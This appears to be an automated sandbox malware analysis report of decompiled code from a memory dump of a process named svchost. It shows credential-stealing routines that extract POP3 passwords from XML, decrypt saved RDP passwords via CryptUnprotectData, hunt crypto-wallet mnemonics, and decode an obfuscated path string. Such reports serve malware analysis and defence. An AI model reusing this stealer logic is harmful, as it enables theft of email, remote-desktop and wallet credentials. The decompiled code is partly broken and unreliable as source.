• lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
• lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcatlstrcpy
• String ID: HWID
• API String ID: 2414487701-1176364606
• Opcode ID: b175aa8880999ee149d541f7e05ae1150fc1fe3f8b56fb0d64109416aa030e7b
• Instruction ID: c6b0a183c93223df74ed0003c9f5084c9454422b450987c55b47bad49ac07ebe
• Opcode Fuzzy Hash: b175aa8880999ee149d541f7e05ae1150fc1fe3f8b56fb0d64109416aa030e7b
• Instruction Fuzzy Hash: C0F0373192521CAFCF115FA5EC44A9A7FAAEF402A4F10C226FD088A160CB758B50DF94
Uniqueness

Uniqueness Score: 0.58%

C-Code - Quality: 100%
			E0BC08EE2(CHAR* __eax, CHAR* _a4) {
				int _t9;
				CHAR* _t16;
				CHAR* _t19;

				_t16 = __eax;
				if(_a4 == 0) {
					_a4 = 0xbc0d832; // 0xbc0d832 is the constant string "HWID" (see the APIs list below)
				}
				if(_t16 == 0) {
					_t16 = 0xbc0d832;
				}
				_t9 = lstrlenA(_a4);
				_t19 = E0BC08D51(lstrlenA(_t16) + _t9 + 1); // allocate room for both strings plus the terminator
				lstrcpyA(_t19, _a4);
				lstrcatA(_t19, _t16);
				return _t19; // concatenation _a4 + __eax; neither operand is freed here
			}

APIs
• lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
• lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
• lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
• lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcatlstrcpy
• String ID: HWID
• API String ID: 2414487701-1176364606
• Opcode ID: 6e3849a6e53596f185c367c6906acbb017d453c4392264a267a9f9e37f734692
• Instruction ID: 6d2ff51ecce3cd8e8a0e514d0078dc1dac716aed594e44700ded4e531cd7a3d9
• Opcode Fuzzy Hash: 6e3849a6e53596f185c367c6906acbb017d453c4392264a267a9f9e37f734692
• Instruction Fuzzy Hash: 86F0A7716216296FDB101FA8EC84AAA7FDCEF151A4B118232FE08C7220DB70DE008BD4
Uniqueness

Uniqueness Score: 0.58%

C-Code - Quality: 74%
			// Decompiler output (quality 74%): _t71, _t56 and _t52 are used below without a declaration.
			E0BC055D9(void* __eflags, intOrPtr _a4, CHAR* _a8) {
				unsigned int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				CHAR* _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				unsigned int _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				intOrPtr _t45;
				char* _t46;
				char* _t47;
				char* _t54;
				intOrPtr _t59;
				char _t60;
				void* _t62;
				void* _t78;
				void* _t80;
				void* _t81;
				void* _t86;
				void* _t88;
				unsigned int _t93;
				CHAR* _t101;

				_t42 = E0BC090FC(_a8);
				if(_t42 == 0) {
					L20:
					return _t42;
				}
				_t42 = E0BC08FF4( &_v52, _a8);
				_pop(_t78);
				if(_t42 != 0) {
					_t45 = E0BC09BE0(_t78, _v44, _v40 >> 1);
					_pop(_t80);
					_v16 = _t45;
					if(_t45 == 0) {
						_v16 = E0BC08D51(_v40);
						E0BC08D91(_v44, _t71, _v40);
					}
					// scan the loaded buffer for every "<POP3_Password2" element
					_push("<POP3_Password2");
					_push(_v16);
					while(1) {
						_t46 = StrStrA();
						if(_t46 == 0) {
							break;
						}
						// the value starts after the tag's closing '>' and ends at the next "</"
						_t47 = StrStrIA(_t46, ">");
						if(_t47 == 0) {
							break;
						}
						_t12 =  &(_t47[1]); // 0x1
						_t101 = _t12;
						_v24 = _t101;
						_t54 = StrStrA(_t101, "</");
						_v28 = _t54;
						if(_t54 == 0) {
							break;
						}
						 *_t54 = 0; // terminate the extracted value in place
						_t93 = lstrlenA(_t101);
						if(_t93 != 0) {
							_v12 = E0BC091E5(_t101);
							if(E0BC09C7F(_t80, _t56, _t93) != 0) {
								_t59 =  *0xbc10d2c; // 0x0
								_v32 = _t59;
								_t60 =  *0xbc10d64; // 0x0
								_v36 = _t60;
								_v8 = _t93 >> 1;
								_t62 = E0BC021B7(_v12,  &_v8,  &_v36);
								_pop(_t86);
								if(_t62 != 0) {
									// record marker 0xbeef0001, then the extracted value, into the output buffer _a4
									_v20 = 0xbeef0001;
									E0BC08A41( &_v20, _t86, _a4, 4);
									E0BC08C6D(_a4, _t86, _v24);
									_pop(_t88);
									E0BC08C37(_v8);
									if(_v8 != 0 && _v12 != 0) {
										E0BC08C4D(_v12, _t88, _v8);
									}
								}
							}
							E0BC08D3D(_v12);
							_pop(_t80);
						}
						// continue searching from the end of the value just processed
						_push("<POP3_Password2");
						_push(_v28);
					}
					// end-of-record marker 0xbeef0002
					_v28 = 0xbeef0002;
					E0BC08A41( &_v28, _t80, _a4, 4);
					_pop(_t81);
					E0BC08C37(_v40);
					if(_v40 != 0) {
						_t52 = _v44;
						if(_v44 != 0) {
							E0BC08C4D(_t52, _t81, _v40);
						}
					}
					E0BC08D3D(_v16);
					_t42 = E0BC0907F( &_v52);
				}
			}

APIs
  • Part of subcall function 0BC090FC: CreateFileA.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,0BC01F1F), ref: 0BC09112
  • Part of subcall function 0BC090FC: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0BC0911E
  • Part of subcall function 0BC08FF4: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
• StrStrA.SHLWAPI(?,<POP3_Password2), ref: 0BC05717
  • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
  • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
  • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
• StrStrIA.SHLWAPI(00000000,0BC0D6D8), ref: 0BC05647
• StrStrA.SHLWAPI(00000001,0BC0D6D4), ref: 0BC05661
• lstrlenA.KERNEL32(00000001), ref: 0BC05676
  • Part of subcall function 0BC091E5: lstrlenA.KERNEL32(0BC01A75,00000000,?,0BC01A75,00000000), ref: 0BC091EC
  • Part of subcall function 0BC091E5: lstrcpyA.KERNEL32(00000000,0BC01A75,?,0BC01A75,00000000), ref: 0BC091FE
  • Part of subcall function 0BC021B7: LocalFree.KERNEL32(?), ref: 0BC02208
  • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$CreateFileLocal$AddressAllocChangeCloseFindFreeHandleModuleNotificationProclstrcpy
• String ID: <POP3_Password2
• API String ID: 2805146493-2923094552
• Opcode ID: 5fbb4425b2fe108d95a7af76478cd8cff3fe5665ba6f6013d26689a87573e5fe
• Instruction ID: bc695bacf5d6d301d9fe18af4c577a8cedf393528a35cf4ab36cd8c0a99cdf0b
• Opcode Fuzzy Hash: 5fbb4425b2fe108d95a7af76478cd8cff3fe5665ba6f6013d26689a87573e5fe
• Instruction Fuzzy Hash: 51413B35931209EFDF11ABA8D886AEDBBF5EF15250F144025E901B62D0DF71AA41EFA0
Uniqueness

Uniqueness Score: 0.07%

C-Code - Quality: 96%
			E0BC072B4(void* __eflags, intOrPtr _a4, CHAR* _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				void* __esi;
				void* _t23;
				void* _t25;
				intOrPtr _t31;
				void* _t39;
				CHAR* _t43;
				void* _t45;
				unsigned int _t48;
				void* _t55;
				void* _t56;

				_t23 = E0BC08FF4( &_v48, _a8);
				if(_t23 == 0) {
					return _t23;
				}
				_t47 = _v36;
				if(_v36 >= 0x100000) {
					L10:
					return E0BC0907F( &_v48);
				}
				_t52 = _v40;
				_t25 = E0BC0909F(_v40, _t47);
				_pop(_t45);
				if(_t25 != 0) {
					goto L10;
				}
				_v12 = E0BC071FA(_t47, "username:s:", _t52);
				_t43 = E0BC071FA(_t47, "password 51:b:", _t52);
				_t31 = E0BC071FA(_t47, "full address:s:", _t52);
				_t56 = _t55 + 0x18;
				_v16 = _t31;
				if(_v12 != 0 && _t43 != 0 && _t31 != 0) {
					_t48 = lstrlenA(_t43);
					E0BC09C7F(_t45, _t43, _t48);
					_v32 = _t48 >> 1;
					_v28 = _t43;
					_v20 = 0;
					_t39 = E0BC01000( &_v32, 0,  &_v24);
					_t56 = _t56 + 0x10;
					if(_t39 != 0) {
						_t66 = _v20;
						if(_v20 != 0) {
							E0BC07121(_a4, _t66, _v12, _v16, _v20, _v24);
							_t56 = _t56 + 0x10;
							LocalFree(_v20);
						}
					}
				}
				E0BC08D3D(_v12);
				E0BC08D3D(_t43);
				E0BC08D3D(_v16);
				goto L10;
			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08FF4: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
                                                                                                                                          • Part of subcall function 0BC0909F: LocalAlloc.KERNEL32(00000040,0000008C,00000000,?,?,0BC01F45,00100000), ref: 0BC090D5
                                                                                                                                          • Part of subcall function 0BC071FA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC07220
                                                                                                                                          • Part of subcall function 0BC071FA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0BC0723C
                                                                                                                                          • Part of subcall function 0BC071FA: StrStrIA.SHLWAPI(?,?,?,00000000,00000000,00000000,00000000), ref: 0BC07259
                                                                                                                                          • Part of subcall function 0BC071FA: lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0726F
                                                                                                                                          • Part of subcall function 0BC071FA: lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0728B
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0BC07335
                                                                                                                                          • Part of subcall function 0BC01000: LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
                                                                                                                                          • Part of subcall function 0BC01000: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                          • Part of subcall function 0BC07121: lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC07386
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$ByteCharLocalMultiWide$AddressAllocCreateFileFreeLibraryLoadProc
                                                                                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                                                                                        • API String ID: 1965316502-2945746679
                                                                                                                                        • Opcode ID: a1cda70f9473d2094ad604f226658dcf67bd14e9d073f1ae216fbca6c58dc355
                                                                                                                                        • Instruction ID: e8d559627dc860c27dfa6e0824a4c04a1658281a1cd91554da69c06dca81ab5f
                                                                                                                                        • Opcode Fuzzy Hash: a1cda70f9473d2094ad604f226658dcf67bd14e9d073f1ae216fbca6c58dc355
                                                                                                                                        • Instruction Fuzzy Hash: 2421B672E302166FDF00ABA5DC41AAFBBB9EF44240F048566E904B31D1EF709E119BB0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.12%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC071FA(unsigned int __eax, char* _a4, short* _a8) {
                                                                                                                                        				int _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				int _t20;
                                                                                                                                        				char* _t24;
                                                                                                                                        				char* _t26;
                                                                                                                                        				CHAR* _t28;
                                                                                                                                        				int _t36;
                                                                                                                                        				CHAR* _t41;
                                                                                                                                        
                                                                                                                                        				_t20 = __eax >> 1;
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				_v12 = 0;
                                                                                                                                        				_v16 = _t20;
                                                                                                                                        				_t36 = WideCharToMultiByte(0, 0, _a8, _t20, 0, 0, 0, 0);
                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                        					L11:
                                                                                                                                        					E0BC08D3D(_v8);
                                                                                                                                        					return _v12;
                                                                                                                                        				}
                                                                                                                                        				_t24 = E0BC08D51(_t21);
                                                                                                                                        				_v8 = _t24;
                                                                                                                                        				if(WideCharToMultiByte(0, 0, _a8, _v16, _t24, _t36, 0, 0) == 0) {
                                                                                                                                        					E0BC08D3D(_v8);
                                                                                                                                        					_v8 = 0;
                                                                                                                                        				}
                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                        					_t26 = StrStrIA(_v8, _a4);
                                                                                                                                        					_v16 = _t26;
                                                                                                                                        					if(_t26 == 0) {
                                                                                                                                        						goto L11;
                                                                                                                                        					}
                                                                                                                                        					_t41 = lstrlenA(_a4) + _v16;
                                                                                                                                        					_t28 = _t41;
                                                                                                                                        					if( *_t41 == 0) {
                                                                                                                                        						goto L11;
                                                                                                                                        					}
                                                                                                                                        					while( *_t28 != 0xd) {
                                                                                                                                        						_t28 =  &(_t28[1]);
                                                                                                                                        						if( *_t28 != 0) {
                                                                                                                                        							continue;
                                                                                                                                        						}
                                                                                                                                        						goto L11;
                                                                                                                                        					}
                                                                                                                                        					 *_t28 = 0;
                                                                                                                                        					_t38 = lstrlenA(_t41);
                                                                                                                                        					if(_t29 != 0) {
                                                                                                                                        						_v12 = E0BC08D51(_t29);
                                                                                                                                        						E0BC08D91(_t41, _t30, _t38);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC07220
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0BC0723C
                                                                                                                                        • StrStrIA.SHLWAPI(?,?,?,00000000,00000000,00000000,00000000), ref: 0BC07259
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0728B
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0726F
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocalMultiWidelstrlen$AddressAllocFreeHandleModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1974053379-0
                                                                                                                                        • Opcode ID: 4daa7f1df09827018cec58ab15cfada623b21739e59c63263bdf5c7e205b6af3
                                                                                                                                        • Instruction ID: e88afd5a0b9b123cc95821fec6da563d1497900a729b34cf089a59e95256be6d
                                                                                                                                        • Opcode Fuzzy Hash: 4daa7f1df09827018cec58ab15cfada623b21739e59c63263bdf5c7e205b6af3
                                                                                                                                        • Instruction Fuzzy Hash: E8214FB1C21259FFEF01AFA4DC818AEBBBDEE45254B158167F900A3150DA319F409B60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                        			E0BC075B0(intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                        				char _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				int _t20;
                                                                                                                                        				CHAR* _t27;
                                                                                                                                        				void* _t32;
                                                                                                                                        				CHAR* _t35;
                                                                                                                                        				void* _t40;
                                                                                                                                        				void* _t41;
                                                                                                                                        				void* _t43;
                                                                                                                                        				intOrPtr _t48;
				void* _t51;

				if(_a16 != 0) {
					_t20 =  *0xbc10d60; // 0x1
					if(_t20 < _a16) {
						_t48 =  *0xbc10d40; // 0x5
						if(_t48 < _a16) {
							E0BC0326D(_t20,  &_v12,  &_v8,  &_a16, _a12);
							E0BC0326D(_t48,  &_v16,  &_v12,  &_v8, _a12);
							_t40 = _t51;
							_t20 = lstrcmpW(_a16, L"mnemonic");
							if(_t20 == 0) {
								_a16 = 0xbeef0000;
								E0BC08A41( &_a16, _t40, _a8, 4);
								_t41 = _t32;
								_t34 = "mnemonic";
								_a16 = lstrlenA("mnemonic");
								E0BC08C37(_t25);
								if(_a16 != 0) {
									E0BC08C4D(_t34, _t41, _a16);
									_pop(_t41);
								}
								_t27 = E0BC09BE0(_t41, _v8, 0xffffffff);
								_pop(_t43);
								_t35 = _t27;
								_t56 = lstrlenA(_t35);
								_t20 = E0BC08C37(_t28);
								if(_t28 != 0 && _t35 != 0) {
									_t20 = E0BC08C4D(_t35, _t43, _t56);
								}
							}
						}
						return _t20;
					}
				}
				return _t20;
			}

0x0bc075ba
0x0bc075c0
0x0bc075c8
0x0bc075cf
0x0bc075d8
0x0bc075eb
0x0bc075fe
0x0bc07604
0x0bc0760d
0x0bc07615
0x0bc07620
0x0bc07627
0x0bc07632
0x0bc07633
0x0bc0763b
0x0bc0763e
0x0bc07647
0x0bc0764e
0x0bc07653
0x0bc07653
0x0bc07659
0x0bc0765f
0x0bc07660
0x0bc07665
0x0bc07667
0x0bc0766e
0x0bc07677
0x0bc0767c
0x0bc0767d
0x0bc0767e
0x00000000
0x0bc0767f
0x0bc075c8
0x0bc07681

APIs
• lstrcmpW.KERNEL32(00000000,mnemonic), ref: 0BC0760D
• lstrlenA.KERNEL32(mnemonic), ref: 0BC07639
• lstrlenA.KERNEL32(00000000), ref: 0BC07663
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcmp
• String ID: mnemonic$mnemonic
• API String ID: 3065309983-891895871
• Opcode ID: b7860eb1710e3914a8ede1e57b2e12a81fe6cb24b07cd8f3631908e18e57d8c7
• Instruction ID: f1095214859dbb207f75e89477d2a7e2fe26f40112c0c63ee07a2ffb5178bf28
• Opcode Fuzzy Hash: b7860eb1710e3914a8ede1e57b2e12a81fe6cb24b07cd8f3631908e18e57d8c7
• Instruction Fuzzy Hash: BC217931A3524A9FCF04AF68E941A9E37A5EF00354F100916E902A31D1EE70BE59DB95
Uniqueness

Uniqueness Score: 1.34%

C-Code - Quality: 89%
			E0BC088C9(CHAR* __edi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* __esi;
				signed int _t23;
				CHAR* _t31;
				void* _t32;
				void* _t35;
				char _t39;
				CHAR* _t41;
				signed int _t42;

				_t40 = __edi;
				_t23 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t23 ^ _t42;
				_v72 = 0x595f486a;
				_v68 = 0x4e4a7843;
				_v64 = 0x74424b2d;
				_v60 = 0x63495250;
				_v56 = 0x64683331;
				_v52 = 0x566e457a;
				_v48 = 0x44716151;
				_v44 = 0x76366f53;
				_v40 = 0x4f6b6d57;
				_v36 = 0x41707572;
				_v32 = 0x67377334;
				_v28 = 0x38473530;
				_v24 = 0x4c6c6946;
				_v20 = 0x55665862;
				_v16 = 0x4d795a32;
				_v12 = 0x65395477;
				_t41 = LocalAlloc(0x40, lstrlenA(__edi) + 4);
				lstrcpyA(_t41, __edi);
				if( *_t41 != 0) {
					_t31 = _t41;
					do {
						_t39 =  *_t31;
						_t35 = 0;
						while(1) {
							_t19 = _t35 - 0x44; // 0x595f486a
							if(_t39 ==  *((intOrPtr*)(_t42 + _t19))) {
								break;
							}
							_t35 = _t35 + 1;
							if(_t35 < 0x40) {
								continue;
							} else {
							}
							goto L7;
						}
						_t21 = (_t35 + 0xfffffffe & 0x0000003f) - 0x44; // 0x595f486a
						 *_t31 =  *((intOrPtr*)(_t42 + _t21));
						L7:
						_t31 =  &(_t31[1]);
					} while ( *_t31 != 0);
				}
				return E0BC09FDC(_t41, _t32, _v8 ^ _t42, _t39, _t40, _t41);
			}

0x0bc088c9
0x0bc088cf
0x0bc088d6
0x0bc088db
0x0bc088e2
0x0bc088e9
0x0bc088f0
0x0bc088f7
0x0bc088fe
0x0bc08905
0x0bc0890c
0x0bc08913
0x0bc0891a
0x0bc08921
0x0bc08928
0x0bc0892f
0x0bc08936
0x0bc0893d
0x0bc08944
0x0bc0895d
0x0bc08961
0x0bc0896a
0x0bc0896c
0x0bc0896e
0x0bc0896e
0x0bc08970
0x0bc08972
0x0bc08972
0x0bc08976
0x00000000
0x00000000
0x0bc08978
0x0bc0897c
0x00000000
0x00000000
0x0bc0897e
0x00000000
0x0bc0897c
0x0bc08986
0x0bc0898a
0x0bc0898c
0x0bc0898c
0x0bc0898d
0x0bc0896e
0x0bc089a0

APIs
• lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
• LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
• lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
Strings
• 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD, xrefs: 0BC088DA, 0BC0895F
• jH_YCxJN-KBtPRIc13hdzEnVQaqDSo6vWmkOrupA4s7g05G8FilLbXfU2ZyMwT9e, xrefs: 0BC08972
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Similarity
• API ID: AllocLocallstrcpylstrlen
• String ID: 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD$jH_YCxJN-KBtPRIc13hdzEnVQaqDSo6vWmkOrupA4s7g05G8FilLbXfU2ZyMwT9e
• API String ID: 2705960802-2318978272
• Opcode ID: bb2de43df0006126d47ed42238cc9c7d5346af92d8e8b735a170e25d0ab49776
• Instruction ID: d0c017d7ed493cf2dca4798c82adaf10b3b14336327b066ba882eb3f25a1388d
• Opcode Fuzzy Hash: bb2de43df0006126d47ed42238cc9c7d5346af92d8e8b735a170e25d0ab49776
• Instruction Fuzzy Hash: AD21A1B0C212989FDB059FA5D8553AEBFB4FF06614F65828CE0A26B380D7308A41CF95
Uniqueness Score: 1.18%

C-Code - Quality: 84%
E0BC09283(intOrPtr* __eax, void* __ecx) {
    void* _v8;
    char _v12;
    void* __esi;
    void** _t9;
    void* _t16;
    void* _t18;
    signed int _t22;
    intOrPtr* _t34;

    _t34 = __eax;
    _t9 =  &_v8;
    _t22 = 0;
    __imp__GetHGlobalFromStream(__eax, _t9);
    if(_t9 < 0) {
        L8:
        return 0;
    }
    _t30 = E0BC089A1(__eax, __ecx);
    if(_t12 < 4) {
        E0BC08B27(_t34);
        goto L8;
    }
    if(GlobalLock(_v8) != 0) {
        _t22 =  !(E0BC0930F(_t15, _t30 + 0xfffffffc));
        GlobalUnlock(_v8);
    }
    _t16 = 0xfffffffc;
     *((intOrPtr*)( *_t34 + 0x14))(_t34, _t16, 0, 2, 0);
    _v12 = 1;
    _t18 = E0BC08B76( &_v12, _t34);
    if(_v12 == 0 || _t18 != _t22) {
        goto L8;
    } else {
        return 1;
    }
}

APIs
• GetHGlobalFromStream.OLE32(?,00000000,?,?,1.00,?,?,00000000,?,0BC0125C), ref: 0BC09295
• GlobalLock.KERNEL32 ref: 0BC092B0
• GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,0BC0125C), ref: 0BC092CD
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Similarity
• API ID: Global$FromLockStreamUnlock
• String ID: 1.00
• API String ID: 2287449323-2728340845
• Opcode ID: 2d5edc186cf389cec12169575de804cb994bcc8c66c23790c1df6217560fbf59
• Instruction ID: 499137286ce53b33d2bee68d2e30469c59f4357d3e9fb5315a5dce0629229ca4
• Opcode Fuzzy Hash: 2d5edc186cf389cec12169575de804cb994bcc8c66c23790c1df6217560fbf59
• Instruction Fuzzy Hash: F401F9727306116FEB106BB8AC49BAF7BE9DFC1220B210225E502E21D1EEB0DE419A51
Uniqueness Score: 0.60%

C-Code - Quality: 82%
E0BC09209(void* __eax, void* __ebx, void* __ecx) {
    void* _v8;
    void** _t5;
    void* _t21;
    void* _t32;
    void* _t33;
    void* _t35;
    signed int _t36;

    _t33 = __eax;
    _t5 =  &_v8;
    _t36 = 0;
    __imp__GetHGlobalFromStream(__eax, _t5, _t32, _t35, __ecx);
    if(_t5 >= 0) {
        _t21 = E0BC089A1(__eax, __ecx);
        if(GlobalLock(_v8) != 0) {
            _t36 = E0BC0930F(_t17, _t21);
            GlobalUnlock(_v8);
        }
    }
    E0BC08B27(_t33);
    return E0BC08C37( !((_t36 & 0x00ff0000 | _t36 >> 0x00000010) >> 0x00000008 | (_t36 & 0x0000ff00 | _t36 << 0x00000010) << 0x00000008));
}

APIs
• GetHGlobalFromStream.OLE32(?,00000000,?,?,?,?,0BC0149C,?,?,00000000,?,0BC0125C), ref: 0BC09218
• GlobalLock.KERNEL32 ref: 0BC0922F
• GlobalUnlock.KERNEL32(00000000,?,?,0BC0149C,?,?,00000000,?,0BC0125C), ref: 0BC09247
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Similarity
• API ID: Global$FromLockStreamUnlock
• String ID: 1.00
• API String ID: 2287449323-2728340845
• Opcode ID: fa73a0ea2442c4d618cb2dfda6befbc841b1e1a34e4a332f4ee8f0cc4bc3fd71
